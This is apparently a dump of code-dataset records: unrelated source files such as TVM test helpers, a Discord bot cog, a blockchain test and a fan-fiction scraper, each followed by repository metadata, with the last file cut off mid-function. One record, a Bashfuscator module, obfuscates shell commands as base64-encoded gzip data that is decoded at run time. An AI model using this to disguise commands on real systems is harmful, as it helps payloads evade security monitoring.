return [*requires_llvm(), *requires_gpu()]
if target.startswith("metal"):
return requires_metal()
if target.startswith("opencl"):
return requires_opencl()
if target.startswith("llvm"):
return requires_llvm()
return []
def parametrize_targets(*args):
def wrap(targets):
def func(f):
params = [
pytest.param(target, tvm.device(target, 0), marks=_target_to_requirement(target))
for target in targets
]
return pytest.mark.parametrize("target,dev", params)(f)
return func
if len(args) == 1 and callable(args[0]):
targets = [t for t, _ in enabled_targets()]
return wrap(targets)(args[0])
return wrap(args)
def identity_after(x, sleep):
if sleep:
time.sleep(sleep)
return x
def terminate_self():
sys.exit(-1)
tvm._ffi._init_api("testing", __name__)
| true | true |
1c3346bb5441b4ef67bd9069e53e3e12aee53d3a | 411 | py | Python | experiments/fdtd-2d/tmp_files/4665.py | LoopTilingBenchmark/benchmark | 52a3d2e70216552a498fd91de02a2fa9cb62122c | [
"BSD-2-Clause"
] | null | null | null | experiments/fdtd-2d/tmp_files/4665.py | LoopTilingBenchmark/benchmark | 52a3d2e70216552a498fd91de02a2fa9cb62122c | [
"BSD-2-Clause"
] | null | null | null | experiments/fdtd-2d/tmp_files/4665.py | LoopTilingBenchmark/benchmark | 52a3d2e70216552a498fd91de02a2fa9cb62122c | [
"BSD-2-Clause"
] | null | null | null | from chill import *
source('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/polybench/polybench-code/stencils/fdtd-2d/kernel.c')
destination('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/experiments/fdtd-2d/tmp_files/4665.c')
procedure('kernel_fdtd_2d')
loop(0)
known(' nx > 1 ')
known(' ny > 1 ')
tile(1,2,16,2)
tile(1,4,64,4)
tile(2,2,16,2)
tile(2,4,64,4)
tile(3,2,16,2)
tile(3,4,64,4)
| 22.833333 | 116 | 0.720195 | from chill import *
source('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/polybench/polybench-code/stencils/fdtd-2d/kernel.c')
destination('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/experiments/fdtd-2d/tmp_files/4665.c')
procedure('kernel_fdtd_2d')
loop(0)
known(' nx > 1 ')
known(' ny > 1 ')
tile(1,2,16,2)
tile(1,4,64,4)
tile(2,2,16,2)
tile(2,4,64,4)
tile(3,2,16,2)
tile(3,4,64,4)
| true | true |
1c3347874c5ab5358cfcfa85a11e8a42aa32e186 | 1,991 | py | Python | src/robot/libdocpkg/model.py | ldtri0209/robotframework | 6bc11a350cbaf5d0801cc5431f32cc1435bb65df | [
"ECL-2.0",
"Apache-2.0"
] | 4 | 2016-01-13T13:48:28.000Z | 2021-09-05T07:14:07.000Z | src/robot/libdocpkg/model.py | ldtri0209/robotframework | 6bc11a350cbaf5d0801cc5431f32cc1435bb65df | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/robot/libdocpkg/model.py | ldtri0209/robotframework | 6bc11a350cbaf5d0801cc5431f32cc1435bb65df | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2018-01-18T22:00:17.000Z | 2018-07-26T10:53:00.000Z | # Copyright 2008-2014 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import with_statement
from robot.utils import setter
from .writer import LibdocWriter
from .output import LibdocOutput
class LibraryDoc(object):
def __init__(self, name='', doc='', version='', type='library',
scope='', named_args=True, doc_format=''):
self.name = name
self.doc = doc
self.version = version
self.type = type
self.scope = scope
self.named_args = named_args
self.doc_format = doc_format
self.inits = []
self.keywords = []
@setter
def scope(self, scope):
return {'TESTCASE': 'test case',
'TESTSUITE': 'test suite',
'GLOBAL': 'global'}.get(scope, scope)
@setter
def doc_format(self, format):
return format or 'ROBOT'
@setter
def keywords(self, kws):
return sorted(kws)
def save(self, output=None, format='HTML'):
with LibdocOutput(output, format) as outfile:
LibdocWriter(format).write(self, outfile)
class KeywordDoc(object):
def __init__(self, name='', args=None, doc=''):
self.name = name
self.args = args or []
self.doc = doc
@property
def shortdoc(self):
return self.doc.splitlines()[0] if self.doc else ''
def __cmp__(self, other):
return cmp(self.name.lower(), other.name.lower())
| 28.855072 | 75 | 0.641888 |
from __future__ import with_statement
from robot.utils import setter
from .writer import LibdocWriter
from .output import LibdocOutput
class LibraryDoc(object):
def __init__(self, name='', doc='', version='', type='library',
scope='', named_args=True, doc_format=''):
self.name = name
self.doc = doc
self.version = version
self.type = type
self.scope = scope
self.named_args = named_args
self.doc_format = doc_format
self.inits = []
self.keywords = []
@setter
def scope(self, scope):
return {'TESTCASE': 'test case',
'TESTSUITE': 'test suite',
'GLOBAL': 'global'}.get(scope, scope)
@setter
def doc_format(self, format):
return format or 'ROBOT'
@setter
def keywords(self, kws):
return sorted(kws)
def save(self, output=None, format='HTML'):
with LibdocOutput(output, format) as outfile:
LibdocWriter(format).write(self, outfile)
class KeywordDoc(object):
def __init__(self, name='', args=None, doc=''):
self.name = name
self.args = args or []
self.doc = doc
@property
def shortdoc(self):
return self.doc.splitlines()[0] if self.doc else ''
def __cmp__(self, other):
return cmp(self.name.lower(), other.name.lower())
| true | true |
1c3347b8d7b003cb8c724ccfeb706a04aa53091d | 728 | py | Python | bashfuscator/modules/compressors/gzip.py | 0xflotus/Bashfuscator | 0615a061336641165d5055b916e81e6db8e3a5a6 | [
"MIT"
] | 859 | 2018-08-07T02:06:01.000Z | 2022-03-24T10:00:13.000Z | bashfuscator/modules/compressors/gzip.py | 0xflotus/Bashfuscator | 0615a061336641165d5055b916e81e6db8e3a5a6 | [
"MIT"
] | 25 | 2018-09-13T19:30:17.000Z | 2022-01-05T17:53:35.000Z | bashfuscator/modules/compressors/gzip.py | 0xflotus/Bashfuscator | 0615a061336641165d5055b916e81e6db8e3a5a6 | [
"MIT"
] | 123 | 2018-08-11T02:48:36.000Z | 2022-03-30T13:46:57.000Z | import gzip
from base64 import b64encode
from bashfuscator.core.mutators.compressor import Compressor
class Gzip(Compressor):
def __init__(self):
super().__init__(
name="Gzip",
description="Compress command with gzip",
sizeRating=3,
timeRating=3,
binariesUsed=["base64", "gunzip"],
author="capnspacehook"
)
def mutate(self, userCmd):
compressedCmd = gzip.compress(userCmd.encode("utf-8"))
compressedCmd = b64encode(compressedCmd).decode("utf-8")
self.mangler.addPayloadLine(f'''* *:printf:^ ^'{compressedCmd}'* *|* *:base64:^ ^-d* *|* *:gunzip:^ ^-c* *''')
return self.mangler.getFinalPayload()
| 30.333333 | 118 | 0.605769 | import gzip
from base64 import b64encode
from bashfuscator.core.mutators.compressor import Compressor
class Gzip(Compressor):
def __init__(self):
super().__init__(
name="Gzip",
description="Compress command with gzip",
sizeRating=3,
timeRating=3,
binariesUsed=["base64", "gunzip"],
author="capnspacehook"
)
def mutate(self, userCmd):
compressedCmd = gzip.compress(userCmd.encode("utf-8"))
compressedCmd = b64encode(compressedCmd).decode("utf-8")
self.mangler.addPayloadLine(f'''* *:printf:^ ^'{compressedCmd}'* *|* *:base64:^ ^-d* *|* *:gunzip:^ ^-c* *''')
return self.mangler.getFinalPayload()
| true | true |
1c3347f5caa6ecc7a8129ca79f55c18637f4c7d9 | 1,055 | py | Python | scripts/AssetChecker/src/checker/main/main.py | sreenut/BlockChain-Framework | 3abfd5420a977573e87e3f0afcd3e6354fa4884d | [
"MIT"
] | 8 | 2018-07-18T17:49:41.000Z | 2022-03-17T01:30:44.000Z | scripts/AssetChecker/src/checker/main/main.py | sreenut/BlockChain-Framework | 3abfd5420a977573e87e3f0afcd3e6354fa4884d | [
"MIT"
] | null | null | null | scripts/AssetChecker/src/checker/main/main.py | sreenut/BlockChain-Framework | 3abfd5420a977573e87e3f0afcd3e6354fa4884d | [
"MIT"
] | 1 | 2018-09-05T07:11:25.000Z | 2018-09-05T07:11:25.000Z | # -*- coding: utf-8 -*-
"""
Created on Fri Dec 8 15:20:09 2017
@author: hpy2
"""
import requests
import json
import hashlib
from pyfiglet import Figlet
def main(filepath, trialchainip):
url = "http://{0}:9000/trialchain/data_asset".format(trialchainip)
with open(filepath, 'rb') as f:
data = f.read()
hasher = hashlib.md5()
hasher.update(data)
md5 = hasher.hexdigest()
r = requests.get(url, params={"md5": md5, "trialchainip": trialchainip})
response = r.json()
f = Figlet(font='slant')
print(f.renderText('TrialChain'))
ordered = {
'asset': response['asset'],
'sha256': response['sha256'],
'issuetxid': response['issuetxid'],
'source': response['source'],
'issued': response['issued'],
'validated': response['validated'],
'ethstatus': response['ethstatus'],
'confirmations': response['confirmations'],
'mchash': response['mchash'],
'ethtxid': response['ethtxid']
}
print(json.dumps(ordered, indent=4))
| 28.513514 | 76 | 0.603791 |
import requests
import json
import hashlib
from pyfiglet import Figlet
def main(filepath, trialchainip):
url = "http://{0}:9000/trialchain/data_asset".format(trialchainip)
with open(filepath, 'rb') as f:
data = f.read()
hasher = hashlib.md5()
hasher.update(data)
md5 = hasher.hexdigest()
r = requests.get(url, params={"md5": md5, "trialchainip": trialchainip})
response = r.json()
f = Figlet(font='slant')
print(f.renderText('TrialChain'))
ordered = {
'asset': response['asset'],
'sha256': response['sha256'],
'issuetxid': response['issuetxid'],
'source': response['source'],
'issued': response['issued'],
'validated': response['validated'],
'ethstatus': response['ethstatus'],
'confirmations': response['confirmations'],
'mchash': response['mchash'],
'ethtxid': response['ethtxid']
}
print(json.dumps(ordered, indent=4))
| true | true |
1c334a270215b12a5f4c0f304d453d9b7a73eb97 | 4,204 | py | Python | PugHelpBot/cogs/channel_clean.py | ZusorCode/PugHelpBot | 162904676bd9e876b2f69b3d3a299e3267ab8828 | [
"MIT"
] | null | null | null | PugHelpBot/cogs/channel_clean.py | ZusorCode/PugHelpBot | 162904676bd9e876b2f69b3d3a299e3267ab8828 | [
"MIT"
] | 1 | 2019-06-26T23:07:09.000Z | 2019-06-26T23:07:09.000Z | PugHelpBot/cogs/channel_clean.py | ZusorCode/PugHelpBot | 162904676bd9e876b2f69b3d3a299e3267ab8828 | [
"MIT"
] | 1 | 2019-06-24T18:41:15.000Z | 2019-06-24T18:41:15.000Z | from ..helpers import Config, get_unique_message_react_users, PingStatus, send_ping
from datetime import datetime, timedelta
import logging
import discord
from discord.ext import commands, tasks
class ChannelClean(commands.Cog):
def __init__(self, bot: commands.Bot, log: logging.Logger, config: Config, ping_status: PingStatus):
self.bot = bot
self.log = log
self.config = config
self.ping_status = ping_status
self.channels_to_check = None
self.initialize.start()
self.log.info("Loaded Cog ChannelClean")
@tasks.loop(seconds=1, count=1)
async def initialize(self):
# wait until bot is fully ready
await self.bot.wait_until_ready()
self.channels_to_check = [discord.utils.get(self.bot.get_all_channels(), name=channel)
for channel in self.config.clean_channels]
self.clean_up_channel.start()
self.log.info("CleanChannel is fully ready")
async def auto_ping_message(self, message, unique_reacts):
if self.config.auto_ping:
await send_ping(message, unique_reacts)
self.ping_status.add_already_pinged(message.id)
async def delete_message(self, message: discord.Message):
await message.delete()
# If the message has normal content display it after deleting
if message.content:
self.log.warning(f"Deleted message {message.content} by {message.author.display_name} in {message.channel.name}")
# Else the message must have an embed
else:
self.log.warning(f"Deleted an embed by {message.author.display_name} in {message.channel.name}")
@tasks.loop(minutes=5)
async def clean_up_channel(self):
# Find the times between we want to check messages
delete_hours_ago_time = datetime.utcnow() - timedelta(hours=self.config.delete_after_hours)
day_ago = datetime.utcnow() - timedelta(hours=24)
for channel in self.channels_to_check: # For each channel obj in channels to check
# Loop over all messages in the channel during the correct time
async for message in channel.history(before=delete_hours_ago_time, after=day_ago):
unique_reacts = await get_unique_message_react_users(message)
message_react_count = len(unique_reacts)
status_message = "It is a non-ping channel" if channel.name in self.config.avoid_pings else "It is a standard channel"
self.log.warning(f"Cleaning channel {channel.name}\n{status_message}")
# If the message is in avoid_pings just delete it
if channel.name in self.config.avoid_pings:
await self.delete_message(message)
else:
# If the message has enough reacts to have notified
if message_react_count >= self.config.min_reacts:
# If it was pinged for delete it
if message.id in self.ping_status.get_already_pinged_simple():
await self.delete_message(message)
# Else ping for it and delete the original message
else:
await self.auto_ping_message(message, unique_reacts)
await self.delete_message(message)
# If it didn't have enough reacts but has enough to not be deleted ping for it.
elif message_react_count >= self.config.min_reacts - self.config.avoid_delete_react_threshold:
# If it was pinged for delete it
if message.id in self.ping_status.get_already_pinged_simple():
await self.delete_message(message)
# Ping for it then delete original
else:
await self.auto_ping_message(message, unique_reacts)
await self.delete_message(message)
# If it didn't hit the threshold either just delete it
else:
await self.delete_message(message)
| 50.650602 | 134 | 0.624167 | from ..helpers import Config, get_unique_message_react_users, PingStatus, send_ping
from datetime import datetime, timedelta
import logging
import discord
from discord.ext import commands, tasks
class ChannelClean(commands.Cog):
def __init__(self, bot: commands.Bot, log: logging.Logger, config: Config, ping_status: PingStatus):
self.bot = bot
self.log = log
self.config = config
self.ping_status = ping_status
self.channels_to_check = None
self.initialize.start()
self.log.info("Loaded Cog ChannelClean")
@tasks.loop(seconds=1, count=1)
async def initialize(self):
await self.bot.wait_until_ready()
self.channels_to_check = [discord.utils.get(self.bot.get_all_channels(), name=channel)
for channel in self.config.clean_channels]
self.clean_up_channel.start()
self.log.info("CleanChannel is fully ready")
async def auto_ping_message(self, message, unique_reacts):
if self.config.auto_ping:
await send_ping(message, unique_reacts)
self.ping_status.add_already_pinged(message.id)
async def delete_message(self, message: discord.Message):
await message.delete()
if message.content:
self.log.warning(f"Deleted message {message.content} by {message.author.display_name} in {message.channel.name}")
else:
self.log.warning(f"Deleted an embed by {message.author.display_name} in {message.channel.name}")
@tasks.loop(minutes=5)
async def clean_up_channel(self):
delete_hours_ago_time = datetime.utcnow() - timedelta(hours=self.config.delete_after_hours)
day_ago = datetime.utcnow() - timedelta(hours=24)
for channel in self.channels_to_check:
async for message in channel.history(before=delete_hours_ago_time, after=day_ago):
unique_reacts = await get_unique_message_react_users(message)
message_react_count = len(unique_reacts)
status_message = "It is a non-ping channel" if channel.name in self.config.avoid_pings else "It is a standard channel"
self.log.warning(f"Cleaning channel {channel.name}\n{status_message}")
if channel.name in self.config.avoid_pings:
await self.delete_message(message)
else:
if message_react_count >= self.config.min_reacts:
if message.id in self.ping_status.get_already_pinged_simple():
await self.delete_message(message)
else:
await self.auto_ping_message(message, unique_reacts)
await self.delete_message(message)
elif message_react_count >= self.config.min_reacts - self.config.avoid_delete_react_threshold:
# If it was pinged for delete it
if message.id in self.ping_status.get_already_pinged_simple():
await self.delete_message(message)
# Ping for it then delete original
else:
await self.auto_ping_message(message, unique_reacts)
await self.delete_message(message)
# If it didn't hit the threshold either just delete it
else:
await self.delete_message(message)
| true | true |
1c334ab0b122af4b812c8f5d28e1a70012bb04b0 | 4,175 | py | Python | test/functional/onix_ignore_mpos_participant_reward.py | onixcoin-io/onix | 37c158a6229fa98c1a86f8b65e91226e36355fd6 | [
"MIT"
] | 6 | 2021-10-31T04:53:09.000Z | 2021-12-16T08:27:06.000Z | test/functional/onix_ignore_mpos_participant_reward.py | onixcoin-io/onix | 37c158a6229fa98c1a86f8b65e91226e36355fd6 | [
"MIT"
] | 1 | 2021-11-29T08:45:38.000Z | 2021-11-29T08:45:38.000Z | test/functional/onix_ignore_mpos_participant_reward.py | onixcoin-io/onix | 37c158a6229fa98c1a86f8b65e91226e36355fd6 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.script import *
from test_framework.mininode import *
from test_framework.address import *
from test_framework.onix import *
import sys
import random
import time
class OnixIgnoreMPOSParticipantRewardTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.extra_args = [['-lastmposheight=999999']]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def remove_from_staking_prevouts(self, remove_prevout):
for j in range(len(self.staking_prevouts)):
prevout = self.staking_prevouts[j]
if prevout[0].serialize() == remove_prevout.serialize():
self.staking_prevouts.pop(j)
break
def run_test(self):
privkey = byte_to_base58(hash256(struct.pack('<I', 0)), 239)
for n in self.nodes:
n.importprivkey(privkey)
self.node = self.nodes[0]
self.node.setmocktime(int(time.time()) - 1000000)
self.node.generatetoaddress(10 + COINBASE_MATURITY, "qSrM9K6FMhZ29Vkp8Rdk8Jp66bbfpjFETq")
"""
pragma solidity ^0.4.12;
contract Test {
function() payable {
}
}
"""
bytecode = "60606040523415600e57600080fd5b5b603580601c6000396000f30060606040525b5b5b0000a165627a7a723058205093ec5d227f741a4c8511f495e12b897d670259ab2f2b5b241af6af08753f5e0029"
contract_address = self.node.createcontract(bytecode)['address']
activate_mpos(self.node)
self.staking_prevouts = collect_prevouts(self.node)
# Only have staking outputs with nValue == 20000.0
# Since the rest of the code relies on this
i = 0
while i < len(self.staking_prevouts):
if self.staking_prevouts[i][1] != 20000*COIN:
self.staking_prevouts.pop(i)
i += 1
nTime = int(time.time()) & 0xfffffff0
self.node.setmocktime(nTime)
# Find the block.number - 505 coinstake's 2nd output
# This will be an mpos participant
mpos_participant_block = self.node.getblock(self.node.getblockhash(self.node.getblockcount() - 505))
mpos_participant_txid = mpos_participant_block['tx'][1]
mpos_participant_tx = self.node.decoderawtransaction(self.node.gettransaction(mpos_participant_txid)['hex'])
mpos_participant_pubkey = hex_str_to_bytes(mpos_participant_tx['vout'][1]['scriptPubKey']['asm'].split(' ')[0])
mpos_participant_hpubkey = hash160(mpos_participant_pubkey)
mpos_participant_addr = hex_hash_to_p2pkh(bytes_to_hex_str(mpos_participant_hpubkey))
tx = CTransaction()
tx.vin = [make_vin_from_unspent(self.node, address=mpos_participant_addr)]
tx.vout = [CTxOut(0, scriptPubKey=CScript([b"\x04", CScriptNum(4000000), CScriptNum(100000), b"\x00", hex_str_to_bytes(contract_address), OP_CALL]))]
tx = rpc_sign_transaction(self.node, tx)
self.remove_from_staking_prevouts(tx.vin[0].prevout)
block, block_sig_key = create_unsigned_mpos_block(self.node, self.staking_prevouts, block_fees=int(10000*COIN)-397897500000, nTime=nTime)
block.vtx.append(tx)
block.vtx[1].vout.append(CTxOut(397897500000, scriptPubKey=CScript([OP_DUP, OP_HASH160, mpos_participant_hpubkey, OP_EQUALVERIFY, OP_CHECKSIG])))
# Delete the mpos participant reward and assign it to the staker
block.vtx[1].vout.pop(-5)
block.vtx[1].vout[1].nValue += 260210250000
# Resign the coinstake tx
block.vtx[1] = rpc_sign_transaction(self.node, block.vtx[1])
block.hashMerkleRoot = block.calc_merkle_root()
block.sign_block(block_sig_key)
# Make sure that the block was rejected
blockcount = self.node.getblockcount()
print(self.node.submitblock(bytes_to_hex_str(block.serialize())))
assert_equal(self.node.getblockcount(), blockcount)
if __name__ == '__main__':
OnixIgnoreMPOSParticipantRewardTest().main()
| 42.602041 | 183 | 0.692216 |
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.script import *
from test_framework.mininode import *
from test_framework.address import *
from test_framework.onix import *
import sys
import random
import time
class OnixIgnoreMPOSParticipantRewardTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.extra_args = [['-lastmposheight=999999']]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def remove_from_staking_prevouts(self, remove_prevout):
for j in range(len(self.staking_prevouts)):
prevout = self.staking_prevouts[j]
if prevout[0].serialize() == remove_prevout.serialize():
self.staking_prevouts.pop(j)
break
def run_test(self):
privkey = byte_to_base58(hash256(struct.pack('<I', 0)), 239)
for n in self.nodes:
n.importprivkey(privkey)
self.node = self.nodes[0]
self.node.setmocktime(int(time.time()) - 1000000)
self.node.generatetoaddress(10 + COINBASE_MATURITY, "qSrM9K6FMhZ29Vkp8Rdk8Jp66bbfpjFETq")
bytecode = "60606040523415600e57600080fd5b5b603580601c6000396000f30060606040525b5b5b0000a165627a7a723058205093ec5d227f741a4c8511f495e12b897d670259ab2f2b5b241af6af08753f5e0029"
contract_address = self.node.createcontract(bytecode)['address']
activate_mpos(self.node)
self.staking_prevouts = collect_prevouts(self.node)
i = 0
while i < len(self.staking_prevouts):
if self.staking_prevouts[i][1] != 20000*COIN:
self.staking_prevouts.pop(i)
i += 1
nTime = int(time.time()) & 0xfffffff0
self.node.setmocktime(nTime)
# This will be an mpos participant
mpos_participant_block = self.node.getblock(self.node.getblockhash(self.node.getblockcount() - 505))
mpos_participant_txid = mpos_participant_block['tx'][1]
mpos_participant_tx = self.node.decoderawtransaction(self.node.gettransaction(mpos_participant_txid)['hex'])
mpos_participant_pubkey = hex_str_to_bytes(mpos_participant_tx['vout'][1]['scriptPubKey']['asm'].split(' ')[0])
mpos_participant_hpubkey = hash160(mpos_participant_pubkey)
mpos_participant_addr = hex_hash_to_p2pkh(bytes_to_hex_str(mpos_participant_hpubkey))
tx = CTransaction()
tx.vin = [make_vin_from_unspent(self.node, address=mpos_participant_addr)]
tx.vout = [CTxOut(0, scriptPubKey=CScript([b"\x04", CScriptNum(4000000), CScriptNum(100000), b"\x00", hex_str_to_bytes(contract_address), OP_CALL]))]
tx = rpc_sign_transaction(self.node, tx)
self.remove_from_staking_prevouts(tx.vin[0].prevout)
block, block_sig_key = create_unsigned_mpos_block(self.node, self.staking_prevouts, block_fees=int(10000*COIN)-397897500000, nTime=nTime)
block.vtx.append(tx)
block.vtx[1].vout.append(CTxOut(397897500000, scriptPubKey=CScript([OP_DUP, OP_HASH160, mpos_participant_hpubkey, OP_EQUALVERIFY, OP_CHECKSIG])))
# Delete the mpos participant reward and assign it to the staker
block.vtx[1].vout.pop(-5)
block.vtx[1].vout[1].nValue += 260210250000
# Resign the coinstake tx
block.vtx[1] = rpc_sign_transaction(self.node, block.vtx[1])
block.hashMerkleRoot = block.calc_merkle_root()
block.sign_block(block_sig_key)
# Make sure that the block was rejected
blockcount = self.node.getblockcount()
print(self.node.submitblock(bytes_to_hex_str(block.serialize())))
assert_equal(self.node.getblockcount(), blockcount)
if __name__ == '__main__':
OnixIgnoreMPOSParticipantRewardTest().main()
| true | true |
1c334b8aca67275b6a7e930a5e216179e7a52f1a | 11,187 | py | Python | fanficfare/adapters/adapter_wwwnovelallcom.py | trishume/FanFicFare | 2ddce1acd5258f8dae5b3860aec1c9643a7a0807 | [
"Apache-2.0"
] | 3 | 2020-11-10T16:43:43.000Z | 2021-04-09T07:12:31.000Z | fanficfare/adapters/adapter_wwwnovelallcom.py | trishume/FanFicFare | 2ddce1acd5258f8dae5b3860aec1c9643a7a0807 | [
"Apache-2.0"
] | null | null | null | fanficfare/adapters/adapter_wwwnovelallcom.py | trishume/FanFicFare | 2ddce1acd5258f8dae5b3860aec1c9643a7a0807 | [
"Apache-2.0"
] | 1 | 2021-04-08T12:25:09.000Z | 2021-04-08T12:25:09.000Z | # -*- coding: utf-8 -*-
# Copyright 2018 FanFicFare team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
####################################################################################################
### Adapted by Rikkit on April 15. 2018
###=================================================================================================
### Tested with Calibre
####################################################################################################
from __future__ import absolute_import
import logging
import re
import json
# py2 vs py3 transition
from .base_adapter import BaseSiteAdapter, makeDate
from bs4 import Comment
from ..htmlcleanup import fix_excess_space, stripHTML
from .. import exceptions as exceptions
from ..dateutils import parse_relative_date_string
logger = logging.getLogger(__name__)
HTML_TAGS = (
'a', 'abbr', 'acronym', 'address', 'applet', 'area', 'article', 'aside', 'audio', 'b', 'base', 'basefont', 'bdi',
'bdo', 'big', 'blockquote', 'body', 'br', 'button', 'canvas', 'caption', 'center', 'cite', 'code', 'col',
'colgroup', 'datalist', 'dd', 'del', 'details', 'dfn', 'dialog', 'dir', 'div', 'dl', 'dt', 'em', 'embed',
'fieldset', 'figcaption', 'figure', 'font', 'footer', 'form', 'frame', 'frameset', 'h1', 'h2', 'h3', 'h4', 'h5',
'h6', 'head', 'header', 'hr', 'html', 'i', 'iframe', 'img', 'input', 'ins', 'kbd', 'label', 'legend', 'li', 'link',
'main', 'map', 'mark', 'menu', 'menuitem', 'meta', 'meter', 'nav', 'noframes', 'noscript', 'object', 'ol',
'optgroup', 'option', 'output', 'p', 'param', 'picture', 'pre', 'progress', 'q', 'rp', 'rt', 'ruby', 's', 'samp',
'script', 'section', 'select', 'small', 'source', 'span', 'strike', 'strong', 'style', 'sub', 'summary', 'sup',
'svg', 'table', 'tbody', 'td', 'template', 'textarea', 'tfoot', 'th', 'thead', 'time', 'title', 'tr', 'track', 'tt',
'u', 'ul', 'var', 'video', 'wbr')
def getClass():
''' Initializing the class '''
return WWWNovelAllComAdapter
class WWWNovelAllComAdapter(BaseSiteAdapter):
''' Adapter for www.novelall.com '''
def __init__(self, config, url):
BaseSiteAdapter.__init__(self, config, url)
self.story.setMetadata('siteabbrev', 'novall')
self.dateformat = "%Y-%m-%dT%H:%M:%S+00:00"
self.is_adult = False
self.username = None
self.password = None
# get storyId from url--url validation guarantees query correct
m = re.match(self.getSiteURLPattern(), url)
if m:
# logger.debug("m.groups: %s"%m.groupdict())
if m.group('novchap') == 'novel':
self.story.setMetadata('storyId', m.group('id'))
# normalized story URL.
self._setURL("https://"+self.getSiteDomain()
+ "/novel/"+self.story.getMetadata('storyId')
+ ".html")
else:
# CHAPTER url -- TEMP storyId--both *will* be changed
# in extractChapterUrlsAndMetadata
# leave passed url unchanged for now.
logger.debug("CHAPTER URL--will be replaced and storyId changed")
self.story.setMetadata('storyId', m.group('id'))
else:
raise exceptions.InvalidStoryURL(url,
self.getSiteDomain(),
self.getSiteExampleURLs())
@staticmethod
def getSiteDomain():
return 'www.novelall.com'
@classmethod
def getSiteExampleURLs(cls):
return "https://www.novelall.com/novel/a-story-name.html"
def getSiteURLPattern(self):
# https://www.novelall.com/novel/Castle-of-Black-Iron.html
# chapter URLs *don't* contain storyId
# https://www.novelall.com/chapter/The-Legendary-Moonlight-Sculptor-Volume-1-Chapter-1/1048282/
return r"https://www\.novelall\.com/(?P<novchap>novel|chapter)/(?P<id>[^/\.]+)(/\d+/?)?(\.html)?$"
def extractChapterUrlsAndMetadata(self):
if self.is_adult or self.getConfig("is_adult"):
addurl = "?waring=1"
else:
addurl = ""
url = self.url+addurl
logger.debug("URL: "+url)
data = self.get_request(url)
## You need to have your is_adult set to true to get this story
if "Please click here to continue the reading." in data:
raise exceptions.AdultCheckRequired(self.url)
soup = self.make_soup(data)
if "/chapter/" in url:
titlea = soup.select("div.title a")[1] # second a is story.
logger.debug("Changing from chapter URL(%s) to story URL(%s)"%(self.url,titlea['href']))
url = titlea['href']
m = re.match(self.getSiteURLPattern(), url)
# logger.debug("m.groups: %s"%m.groupdict())
self.story.setMetadata('storyId', m.group('id'))
# normalized story URL.
self._setURL("https://"+self.getSiteDomain()
+ "/novel/"+self.story.getMetadata('storyId')
+ ".html")
url = self.url+addurl
logger.debug("URL2: "+url)
data = self.get_request(url)
## You need to have your is_adult set to true to get this story
if "Please click here to continue the reading." in data:
raise exceptions.AdultCheckRequired(self.url)
soup = self.make_soup(data)
## JSON removed from site.
# story_ld = json.loads(soup.find('script', type='application/ld+json').string)
title = soup.find('h1').string
if title.endswith(" Novel"):
title = title[:-len(" Novel")]
self.story.setMetadata('title', title)
authorspan = soup.find('span',text='Author:')
authora = authorspan.find_next_sibling('a')
## authors appear to just be comma separated and the only URL
## is a search, so this appears to work.
for author in authora.string.split(','):
self.story.addToList('author', author)
self.story.addToList('authorId', author)
self.story.addToList("authorUrl", "https://%s/search/?author=%s" % (self.getSiteDomain(), author))
## <i class="score-number">4<em>.1</em></i>
self.story.setMetadata('stars',stripHTML(soup.find('i',class_='score-number')))
## I'm not finding a translator or publisher field anymore.
# self.story.setMetadata('translator',story_ld["publisher"]["name"])
## getting votes
mc = re.match(r"\((?P<votes>[\d,]+) votes\)", data)
if mc:
self.story.setMetadata('votes', mc.group('votes'))
## getting status
status = soup.find('span', string='Status:').next_sibling.strip()
if status == 'Completed':
self.story.setMetadata('status', 'Completed')
else:
self.story.setMetadata('status', 'In-Progress')
## getting release frequency
rf = soup.find('span', string='Release Frequency:')
if rf:
self.story.setMetadata('releaseFrequency', rf.next_sibling.strip())
## getting released
released = soup.find('span', string='Released:')
if released:
self.story.setMetadata('released', released.find_next_sibling('a').string.strip())
## getting follows
follows = soup.find('num', {"id": "follow_num"})
if follows:
self.story.setMetadata('follows', follows.string)
## getting views
mc = re.match(r"It has (?P<views>[\d,]+) views", data)
if mc:
self.story.setMetadata('views', mc.group('views'))
## getting alternative titles
alt_titles = soup.find('span', string='Alternative(s):')
if alt_titles:
self.story.setMetadata('altTitles', alt_titles.next_sibling.string.split('; '))
## getting genres
for a in soup.find('span', string='Genre(s):').find_next_siblings("a"):
self.story.addToList('genre', a.string)
## getting tags
tags = soup.find('span', string='Tag(s):')
if tags:
for a in tags.find_next_siblings("a"):
self.story.addToList('sitetags', a.string)
## getting description
self.setDescription(url, soup.select_one('#show').string.strip())
## getting cover
img = soup.find('img', class_='detail-cover')
if img:
self.setCoverImage(url,img['src'])
## getting chapters
cdata = soup.select('.detail-chlist li')
cdata.reverse()
cdates = []
for li in cdata:
# <span class="time">31 minutes ago</span>s
# <span class="time">Jul 15, 2017</span>
dt = li.select_one('.time').string
if "ago" in dt:
cdates.append(parse_relative_date_string(dt))
else:
